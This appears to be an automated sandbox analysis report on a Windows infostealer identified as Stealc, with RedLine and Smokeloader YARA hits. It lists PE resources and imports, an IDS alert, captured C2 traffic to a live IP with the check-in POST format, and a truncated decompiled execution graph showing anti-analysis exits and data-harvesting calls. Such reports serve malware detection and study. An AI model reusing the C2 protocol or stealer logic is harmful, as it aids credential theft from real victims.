                                RT_ICON0x1148480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.7514450867052023
                                RT_ICON0x114db00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.5196058091286307
                                RT_ICON0x1173580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.62406191369606
                                RT_ICON0x1184000x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.6311475409836066
                                RT_ICON0x118d880x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.7659574468085106
                                RT_ICON0x1192680xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.39525586353944564
                                RT_ICON0x11a1100x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.4981949458483754
                                RT_ICON0x11a9b80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.5172811059907834
                                RT_ICON0x11b0800x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.5549132947976878
                                RT_ICON0x11b5e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TurkishTurkey0.34813278008298754
                                RT_ICON0x11db900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TurkishTurkey0.3773452157598499
                                RT_ICON0x11ec380x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TurkishTurkey0.39918032786885244
                                RT_ICON0x11f5c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TurkishTurkey0.41312056737588654
                                RT_ICON0x11faa00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.39792110874200426
                                RT_ICON0x1209480x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5591155234657039
                                RT_ICON0x1211f00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6169354838709677
                                RT_ICON0x1218b80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6416184971098265
                                RT_ICON0x121e200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.43550656660412757
                                RT_ICON0x122ec80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.42991803278688523
                                RT_ICON0x1238500x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.47606382978723405
                                RT_ICON0x123d200xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.39525586353944564
                                RT_ICON0x124bc80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.4981949458483754
                                RT_ICON0x1254700x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.5172811059907834
                                RT_ICON0x125b380x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.5549132947976878
                                RT_ICON0x1260a00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TurkishTurkey0.34813278008298754
                                RT_ICON0x1286480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TurkishTurkey0.3773452157598499
                                RT_ICON0x1296f00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TurkishTurkey0.39918032786885244
                                RT_ICON0x12a0780x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TurkishTurkey0.41312056737588654
                                RT_STRING0x12a8600x476data0.44921190893169877
                                RT_STRING0x12acd80x504data0.45794392523364486
                                RT_STRING0x12b1e00x6b4data0.4324009324009324
                                RT_STRING0x12b8980x760data0.4253177966101695
                                RT_STRING0x12bff80x706data0.42880978865406005
                                RT_STRING0x12c7000x8b8data0.4211469534050179
                                RT_STRING0x12cfb80x6d2data0.4306987399770905
                                RT_STRING0x12d6900x4a4data0.46380471380471383
                                RT_STRING0x12db380x62edata0.4361567635903919
                                RT_STRING0x12e1680x520data0.45198170731707316
                                RT_STRING0x12e6880x722data0.4244249726177437
                                RT_STRING0x12edb00x564data0.4391304347826087
                                RT_STRING0x12f3180x2edata0.6304347826086957
                                RT_GROUP_CURSOR0x12a6880x14data1.15
                                RT_GROUP_ICON0x11fa280x76dataTurkishTurkey0.6694915254237288
                                RT_GROUP_ICON0x12a4e00x76dataTurkishTurkey0.6694915254237288
                                RT_GROUP_ICON0x1191f00x76dataTurkishTurkey0.6610169491525424
                                RT_GROUP_ICON0x123cb80x68dataTurkishTurkey0.7211538461538461
                                RT_VERSION0x12a6a00x1bcdata0.581081081081081

                                Imports

                                DLLImport
                                KERNEL32.dllSearchPathW, WriteConsoleOutputCharacterA, GetCommState, ReadConsoleA, InterlockedDecrement, QueryDosDeviceA, InterlockedCompareExchange, GetComputerNameW, GetTimeFormatA, ConnectNamedPipe, FreeEnvironmentStringsA, GetModuleHandleW, GetConsoleAliasesLengthA, SetCommState, LoadLibraryW, GetConsoleMode, CopyFileW, ReadConsoleOutputW, GetConsoleAliasExesLengthW, FormatMessageW, GetSystemTimeAdjustment, DeleteVolumeMountPointW, HeapDestroy, GetFileAttributesW, GetBinaryTypeA, ReleaseSemaphore, GetShortPathNameA, GetLastError, GetLongPathNameW, GetProcAddress, SetStdHandle, BuildCommDCBW, GetNumaHighestNodeNumber, ResetEvent, LoadLibraryA, LocalAlloc, SetCalendarInfoW, FindAtomA, GetModuleFileNameA, GetDefaultCommConfigA, FatalAppExitA, GlobalReAlloc, GetVolumeInformationW, HeapAlloc, Sleep, ExitProcess, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, HeapCreate, WriteFile, GetStdHandle, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetLocaleInfoA, WideCharToMultiByte, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW
                                USER32.dllSetFocus

                                Possible Origin

                                Language of compilation systemCountry where language is spokenMap
                                TurkishTurkey

                                Network Behavior

                                Suricata IDS Alerts

                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2024-10-08T07:21:12.143104+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.54970462.204.41.15080TCP

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Oct 8, 2024 07:21:10.883476019 CEST4970480192.168.2.562.204.41.150
                                Oct 8, 2024 07:21:10.888814926 CEST804970462.204.41.150192.168.2.5
                                Oct 8, 2024 07:21:10.889111996 CEST4970480192.168.2.562.204.41.150
                                Oct 8, 2024 07:21:10.889153957 CEST4970480192.168.2.562.204.41.150
                                Oct 8, 2024 07:21:10.894277096 CEST804970462.204.41.150192.168.2.5
                                Oct 8, 2024 07:21:11.587898016 CEST804970462.204.41.150192.168.2.5
                                Oct 8, 2024 07:21:11.588126898 CEST4970480192.168.2.562.204.41.150
                                Oct 8, 2024 07:21:11.593626976 CEST4970480192.168.2.562.204.41.150
                                Oct 8, 2024 07:21:11.598903894 CEST804970462.204.41.150192.168.2.5
                                Oct 8, 2024 07:21:12.142914057 CEST804970462.204.41.150192.168.2.5
                                Oct 8, 2024 07:21:12.143104076 CEST4970480192.168.2.562.204.41.150
                                Oct 8, 2024 07:21:17.147882938 CEST804970462.204.41.150192.168.2.5
                                Oct 8, 2024 07:21:17.147989988 CEST4970480192.168.2.562.204.41.150
                                Oct 8, 2024 07:21:34.565773010 CEST4970480192.168.2.562.204.41.150

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Oct 8, 2024 07:21:46.709901094 CEST5353248162.159.36.2192.168.2.5
                                Oct 8, 2024 07:21:47.217885017 CEST53640591.1.1.1192.168.2.5

                                HTTP Request Dependency Graph

                                • 62.204.41.150

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.54970462.204.41.150806780C:\Users\user\Desktop\YLshJwBcrT.exe
                                TimestampBytes transferredDirectionData
                                Oct 8, 2024 07:21:10.889153957 CEST88OUTGET / HTTP/1.1
                                Host: 62.204.41.150
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Oct 8, 2024 07:21:11.587898016 CEST203INHTTP/1.1 200 OK
                                Date: Tue, 08 Oct 2024 05:21:11 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Content-Length: 0
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Oct 8, 2024 07:21:11.593626976 CEST419OUTPOST /edd20096ecef326d.php HTTP/1.1
                                Content-Type: multipart/form-data; boundary=----GIEHIDHJDBFIIECAKECB
                                Host: 62.204.41.150
                                Content-Length: 219
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 34 46 34 41 38 42 33 46 41 38 33 31 34 38 31 35 32 38 31 36 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 2d 2d 0d 0a
                                Data Ascii: ------GIEHIDHJDBFIIECAKECBContent-Disposition: form-data; name="hwid"B64F4A8B3FA83148152816------GIEHIDHJDBFIIECAKECBContent-Disposition: form-data; name="build"default6_cap------GIEHIDHJDBFIIECAKECB--
                                Oct 8, 2024 07:21:12.142914057 CEST210INHTTP/1.1 200 OK
                                Date: Tue, 08 Oct 2024 05:21:11 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Content-Length: 8
                                Keep-Alive: timeout=5, max=99
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 59 6d 78 76 59 32 73 3d
                                Data Ascii: YmxvY2s=


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:01:21:01
                                Start date:08/10/2024
                                Path:C:\Users\user\Desktop\YLshJwBcrT.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\YLshJwBcrT.exe"
                                Imagebase:0x400000
                                File size:336'384 bytes
                                MD5 hash:015AC525CDF1038D8CEB75BA43068DA0
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2342767053.000000000085A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2342788236.000000000088A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2063251996.0000000002330000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:4
                                Start time:01:21:05
                                Start date:08/10/2024
                                Path:C:\Windows\SysWOW64\WerFault.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 812
                                Imagebase:0xb30000
                                File size:483'680 bytes
                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:6
                                Start time:01:21:06
                                Start date:08/10/2024
                                Path:C:\Windows\SysWOW64\WerFault.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 820
                                Imagebase:0xb30000
                                File size:483'680 bytes
                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:8
                                Start time:01:21:07
                                Start date:08/10/2024
                                Path:C:\Windows\SysWOW64\WerFault.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 812
                                Imagebase:0xb30000
                                File size:483'680 bytes
                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:10
                                Start time:01:21:08
                                Start date:08/10/2024
                                Path:C:\Windows\SysWOW64\WerFault.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 860
                                Imagebase:0xb30000
                                File size:483'680 bytes
                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:12
                                Start time:01:21:08
                                Start date:08/10/2024
                                Path:C:\Windows\SysWOW64\WerFault.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 984
                                Imagebase:0xb30000
                                File size:483'680 bytes
                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:14
                                Start time:01:21:09
                                Start date:08/10/2024
                                Path:C:\Windows\SysWOW64\WerFault.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 1008
                                Imagebase:0xb30000
                                File size:483'680 bytes
                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:16
                                Start time:01:21:13
                                Start date:08/10/2024
                                Path:C:\Windows\SysWOW64\WerFault.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 1300
                                Imagebase:0xb30000
                                File size:483'680 bytes
                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:6.6%
                                  Dynamic/Decrypted Code Coverage:4.9%
                                  Signature Coverage:12.3%
                                  Total number of Nodes:1417
                                  Total number of Limit Nodes:28
                                  execution_graph 27639 409440 strlen malloc strcpy_s free std::exception::exception 27597 85a386 27598 85a395 27597->27598 27601 85ab26 27598->27601 27604 85ab41 27601->27604 27602 85ab4a CreateToolhelp32Snapshot 27603 85ab66 Module32First 27602->27603 27602->27604 27605 85ab75 27603->27605 27606 85a39e 27603->27606 27604->27602 27604->27603 27608 85a7e5 27605->27608 27609 85a810 27608->27609 27610 85a821 VirtualAlloc 27609->27610 27611 85a859 27609->27611 27610->27611 27611->27611 27677 22e932a ??2@YAPAXI RaiseException allocator 27697 41ce48 LeaveCriticalSection __mtinitlocknum 27739 22f1525 strtok_s strtok_s lstrlen lstrcpy ctype 27641 41b050 6 API calls 3 library calls 27679 22e9b37 9 API calls 27701 22f1c35 110 API calls 27742 406f60 memcpy 27643 41dc60 atexit 27744 410765 279 API calls 27644 22f6a0a ExitProcess 27702 417667 lstrcpy 27745 22fd106 41 API calls __amsg_exit 27612 22e0005 27617 22e092b GetPEB 27612->27617 27614 22e0030 27618 22e003c 27614->27618 27617->27614 27619 22e0049 27618->27619 27633 22e0e0f SetErrorMode SetErrorMode 27619->27633 27624 22e0265 27625 22e02ce VirtualProtect 27624->27625 27627 22e030b 27625->27627 27626 22e0439 VirtualFree 27628 22e04be 27626->27628 27629 22e05f4 LoadLibraryA 27626->27629 27627->27626 27628->27629 27630 22e04e3 LoadLibraryA 27628->27630 27632 22e08c7 27629->27632 27630->27628 27634 22e0223 27633->27634 27635 22e0d90 27634->27635 27636 22e0dad 27635->27636 27637 22e0dbb GetPEB 27636->27637 27638 22e0238 VirtualAlloc 27636->27638 27637->27638 27638->27624 27703 41b270 5 API calls 2 library calls 27648 22f15b3 18 API calls ctype 27747 22ef567 56 API calls 27748 22efd67 152 API calls 27649 41bc11 71 API calls 2 library calls 27650 22fbe78 162 API calls 2 library calls 27651 22fcd97 170 API calls 2 library calls 27652 22f3b7d 91 API calls 2 library calls 27653 41ac2c 71 API calls ctype 27654 22f6a40 6 API calls 27751 22f6d18 643 API calls 27709 22f102b strtok_s lstrlen lstrcpy 27710 22f6c57 689 API calls 27711 22f140b strtok_s 27713 22fd0af RtlLeaveCriticalSection __mtinitlocknum 27655 22f32ae 22 API calls 27656 4090c3 5 API calls allocator 27714 22f140b StrCmpCA strtok_s 27753 22fcd90 173 API calls 3 library calls 27754 41abd0 free std::exception::_Tidy ctype 27658 22e6ebc VirtualProtect 27716 22f04b7 88 API calls 27717 22f0cb6 30 API calls 27756 413916 91 API calls 2 library calls 27757 4183dc 15 API calls 27758 22fcd8f 6 API calls 2 library calls 27718 22f102b StrCmpCA strtok_s lstrlen lstrcpy 27759 22f118b strtok_s StrCmpCA strtok_s lstrlen lstrcpy 27662 4090e7 memcpy RaiseException codecvt __CxxThrowException@8 27720 41ceea SetUnhandledExceptionFilter 27721 22f3823 StrCmpCA StrCmpCA StrCmpCA StrCmpCA strtok_s 26179 4169f0 26222 402260 26179->26222 26196 417850 3 API calls 26197 416a30 26196->26197 26198 4178e0 3 API calls 26197->26198 26199 416a43 26198->26199 26355 41a9b0 26199->26355 26201 416a64 26202 41a9b0 4 API calls 26201->26202 26203 416a6b 26202->26203 26204 41a9b0 4 API calls 26203->26204 26205 416a72 26204->26205 26206 41a9b0 4 API calls 26205->26206 26207 416a79 26206->26207 26208 41a9b0 4 API calls 26207->26208 26209 416a80 26208->26209 26363 41a8a0 26209->26363 26211 416b0c 26367 416920 GetSystemTime 26211->26367 26212 416a89 26212->26211 26214 416ac2 OpenEventA 26212->26214 26216 416af5 CloseHandle Sleep 26214->26216 26217 416ad9 26214->26217 26219 416b0a 26216->26219 26221 416ae1 CreateEventA 26217->26221 26219->26212 26220 416b16 CloseHandle ExitProcess 26221->26211 26564 4045c0 17 API calls 26222->26564 26224 402274 26225 4045c0 34 API calls 26224->26225 26226 40228d 26225->26226 26227 4045c0 34 API calls 26226->26227 26228 4022a6 26227->26228 26229 4045c0 34 API calls 26228->26229 26230 4022bf 26229->26230 26231 4045c0 34 API calls 26230->26231 26232 4022d8 26231->26232 26233 4045c0 34 API calls 26232->26233 26234 4022f1 26233->26234 26235 4045c0 34 API calls 26234->26235 26236 40230a 26235->26236 26237 4045c0 34 API calls 26236->26237 26238 402323 26237->26238 26239 4045c0 34 API calls 26238->26239 26240 40233c 26239->26240 26241 4045c0 34 API calls 26240->26241 26242 402355 26241->26242 26243 4045c0 34 API calls 26242->26243 26244 40236e 26243->26244 26245 4045c0 34 API calls 26244->26245 26246 402387 26245->26246 26247 4045c0 34 API calls 26246->26247 26248 4023a0 26247->26248 26249 4045c0 34 API calls 26248->26249 26250 4023b9 26249->26250 26251 4045c0 34 API calls 26250->26251 26252 4023d2 26251->26252 26253 4045c0 34 API calls 26252->26253 26254 4023eb 26253->26254 26255 4045c0 34 API calls 26254->26255 26256 402404 26255->26256 26257 4045c0 34 API calls 26256->26257 26258 40241d 26257->26258 26259 4045c0 34 API calls 26258->26259 26260 402436 26259->26260 26261 4045c0 34 API calls 26260->26261 26262 40244f 26261->26262 26263 4045c0 34 API calls 26262->26263 26264 402468 26263->26264 26265 4045c0 34 API calls 26264->26265 26266 402481 26265->26266 26267 4045c0 34 API calls 26266->26267 26268 40249a 26267->26268 26269 4045c0 34 API calls 26268->26269 26270 4024b3 26269->26270 26271 4045c0 34 API calls 26270->26271 26272 4024cc 26271->26272 26273 4045c0 34 API calls 26272->26273 26274 4024e5 26273->26274 26275 4045c0 34 API calls 26274->26275 26276 4024fe 26275->26276 26277 4045c0 34 API calls 26276->26277 26278 402517 26277->26278 26279 4045c0 34 API calls 26278->26279 26280 402530 26279->26280 26281 4045c0 34 API calls 26280->26281 26282 402549 26281->26282 26283 4045c0 34 API calls 26282->26283 26284 402562 26283->26284 26285 4045c0 34 API calls 26284->26285 26286 40257b 26285->26286 26287 4045c0 34 API calls 26286->26287 26288 402594 26287->26288 26289 4045c0 34 API calls 26288->26289 26290 4025ad 26289->26290 26291 4045c0 34 API calls 26290->26291 26292 4025c6 26291->26292 26293 4045c0 34 API calls 26292->26293 26294 4025df 26293->26294 26295 4045c0 34 API calls 26294->26295 26296 4025f8 26295->26296 26297 4045c0 34 API calls 26296->26297 26298 402611 26297->26298 26299 4045c0 34 API calls 26298->26299 26300 40262a 26299->26300 26301 4045c0 34 API calls 26300->26301 26302 402643 26301->26302 26303 4045c0 34 API calls 26302->26303 26304 40265c 26303->26304 26305 4045c0 34 API calls 26304->26305 26306 402675 26305->26306 26307 4045c0 34 API calls 26306->26307 26308 40268e 26307->26308 26309 419860 26308->26309 26568 419750 GetPEB 26309->26568 26311 419868 26312 419a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 26311->26312 26313 41987a 26311->26313 26314 419af4 GetProcAddress 26312->26314 26315 419b0d 26312->26315 26318 41988c 21 API calls 26313->26318 26314->26315 26316 419b46 26315->26316 26317 419b16 GetProcAddress GetProcAddress 26315->26317 26319 419b68 26316->26319 26320 419b4f GetProcAddress 26316->26320 26317->26316 26318->26312 26321 419b71 GetProcAddress 26319->26321 26322 419b89 26319->26322 26320->26319 26321->26322 26323 416a00 26322->26323 26324 419b92 GetProcAddress GetProcAddress 26322->26324 26325 41a740 26323->26325 26324->26323 26326 41a750 26325->26326 26327 416a0d 26326->26327 26328 41a77e lstrcpy 26326->26328 26329 4011d0 26327->26329 26328->26327 26330 4011e8 26329->26330 26331 401217 26330->26331 26332 40120f ExitProcess 26330->26332 26333 401160 GetSystemInfo 26331->26333 26334 401184 26333->26334 26335 40117c ExitProcess 26333->26335 26336 401110 GetCurrentProcess VirtualAllocExNuma 26334->26336 26337 401141 ExitProcess 26336->26337 26338 401149 26336->26338 26569 4010a0 VirtualAlloc 26338->26569 26341 401220 26573 4189b0 26341->26573 26344 401249 __aulldiv 26345 40129a 26344->26345 26346 401292 ExitProcess 26344->26346 26347 416770 GetUserDefaultLangID 26345->26347 26348 4167d3 GetUserDefaultLCID 26347->26348 26349 416792 26347->26349 26348->26196 26349->26348 26350 4167c1 ExitProcess 26349->26350 26351 4167a3 ExitProcess 26349->26351 26352 4167b7 ExitProcess 26349->26352 26353 4167cb ExitProcess 26349->26353 26354 4167ad ExitProcess 26349->26354 26575 41a710 26355->26575 26357 41a9c1 lstrlenA 26360 41a9e0 26357->26360 26358 41aa18 26576 41a7a0 26358->26576 26360->26358 26362 41a9fa lstrcpy lstrcatA 26360->26362 26361 41aa24 26361->26201 26362->26358 26364 41a8bb 26363->26364 26365 41a90b 26364->26365 26366 41a8f9 lstrcpy 26364->26366 26365->26212 26366->26365 26580 416820 26367->26580 26369 41698e 26370 416998 sscanf 26369->26370 26609 41a800 26370->26609 26372 4169aa SystemTimeToFileTime SystemTimeToFileTime 26373 4169e0 26372->26373 26374 4169ce 26372->26374 26376 415b10 26373->26376 26374->26373 26375 4169d8 ExitProcess 26374->26375 26377 415b1d 26376->26377 26378 41a740 lstrcpy 26377->26378 26379 415b2e 26378->26379 26611 41a820 lstrlenA 26379->26611 26382 41a820 2 API calls 26383 415b64 26382->26383 26384 41a820 2 API calls 26383->26384 26385 415b74 26384->26385 26615 416430 26385->26615 26388 41a820 2 API calls 26389 415b93 26388->26389 26390 41a820 2 API calls 26389->26390 26391 415ba0 26390->26391 26392 41a820 2 API calls 26391->26392 26393 415bad 26392->26393 26394 41a820 2 API calls 26393->26394 26395 415bf9 26394->26395 26624 4026a0 26395->26624 26403 415cc3 26404 416430 lstrcpy 26403->26404 26405 415cd5 26404->26405 26406 41a7a0 lstrcpy 26405->26406 26407 415cf2 26406->26407 26408 41a9b0 4 API calls 26407->26408 26409 415d0a 26408->26409 26410 41a8a0 lstrcpy 26409->26410 26411 415d16 26410->26411 26412 41a9b0 4 API calls 26411->26412 26413 415d3a 26412->26413 26414 41a8a0 lstrcpy 26413->26414 26415 415d46 26414->26415 26416 41a9b0 4 API calls 26415->26416 26417 415d6a 26416->26417 26418 41a8a0 lstrcpy 26417->26418 26419 415d76 26418->26419 26420 41a740 lstrcpy 26419->26420 26421 415d9e 26420->26421 27350 417500 GetWindowsDirectoryA 26421->27350 26424 41a7a0 lstrcpy 26425 415db8 26424->26425 27360 404880 26425->27360 26427 415dbe 27506 4117a0 26427->27506 26429 415dc6 26430 41a740 lstrcpy 26429->26430 26431 415de9 26430->26431 26432 401590 lstrcpy 26431->26432 26433 415dfd 26432->26433 27526 405960 39 API calls ctype 26433->27526 26435 415e03 27527 411050 strtok_s strtok_s lstrlenA lstrcpy 26435->27527 26437 415e0e 26438 41a740 lstrcpy 26437->26438 26439 415e32 26438->26439 26440 401590 lstrcpy 26439->26440 26441 415e46 26440->26441 27528 405960 39 API calls ctype 26441->27528 26443 415e4c 27529 410d90 7 API calls 26443->27529 26445 415e57 26446 41a740 lstrcpy 26445->26446 26447 415e79 26446->26447 26448 401590 lstrcpy 26447->26448 26449 415e8d 26448->26449 27530 405960 39 API calls ctype 26449->27530 26451 415e93 27531 410f40 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 26451->27531 26453 415e9e 26454 401590 lstrcpy 26453->26454 26455 415eb5 26454->26455 27532 411a10 121 API calls 26455->27532 26457 415eba 26458 41a740 lstrcpy 26457->26458 26459 415ed6 26458->26459 27533 404fb0 8 API calls 26459->27533 26461 415edb 26462 401590 lstrcpy 26461->26462 26463 415f5b 26462->26463 27534 410740 292 API calls 26463->27534 26465 415f60 26466 41a740 lstrcpy 26465->26466 26467 415f86 26466->26467 26468 401590 lstrcpy 26467->26468 26469 415f9a 26468->26469 27535 405960 39 API calls ctype 26469->27535 26471 415fa0 27536 411170 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 26471->27536 26473 415fab 26474 401590 lstrcpy 26473->26474 26475 415feb 26474->26475 27537 401e80 67 API calls 26475->27537 26477 415ff0 26478 416000 26477->26478 26479 416092 26477->26479 26481 41a740 lstrcpy 26478->26481 26480 41a7a0 lstrcpy 26479->26480 26482 4160a5 26480->26482 26483 416020 26481->26483 26484 401590 lstrcpy 26482->26484 26485 401590 lstrcpy 26483->26485 26486 4160b9 26484->26486 26487 416034 26485->26487 27541 405960 39 API calls ctype 26486->27541 27538 405960 39 API calls ctype 26487->27538 26490 4160bf 27542 413560 36 API calls 26490->27542 26491 41603a 27539 4112d0 21 API calls ctype 26491->27539 26494 416045 26496 401590 lstrcpy 26494->26496 26495 41608a 26497 41610b 26495->26497 26499 401590 lstrcpy 26495->26499 26498 416085 26496->26498 26501 416130 26497->26501 26504 401590 lstrcpy 26497->26504 27540 413dc0 75 API calls 26498->27540 26503 4160e7 26499->26503 26502 416155 26501->26502 26505 401590 lstrcpy 26501->26505 26507 41617a 26502->26507 26511 401590 lstrcpy 26502->26511 27543 4140b0 64 API calls ctype 26503->27543 26508 41612b 26504->26508 26509 416150 26505->26509 26512 41619f 26507->26512 26518 401590 lstrcpy 26507->26518 27545 414780 116 API calls ctype 26508->27545 27546 414bb0 67 API calls ctype 26509->27546 26510 4160ec 26516 401590 lstrcpy 26510->26516 26517 416175 26511->26517 26514 4161c4 26512->26514 26519 401590 lstrcpy 26512->26519 26521 4161e9 26514->26521 26526 401590 lstrcpy 26514->26526 26520 416106 26516->26520 27547 414d70 75 API calls 26517->27547 26523 41619a 26518->26523 26524 4161bf 26519->26524 27544 415100 71 API calls 26520->27544 26527 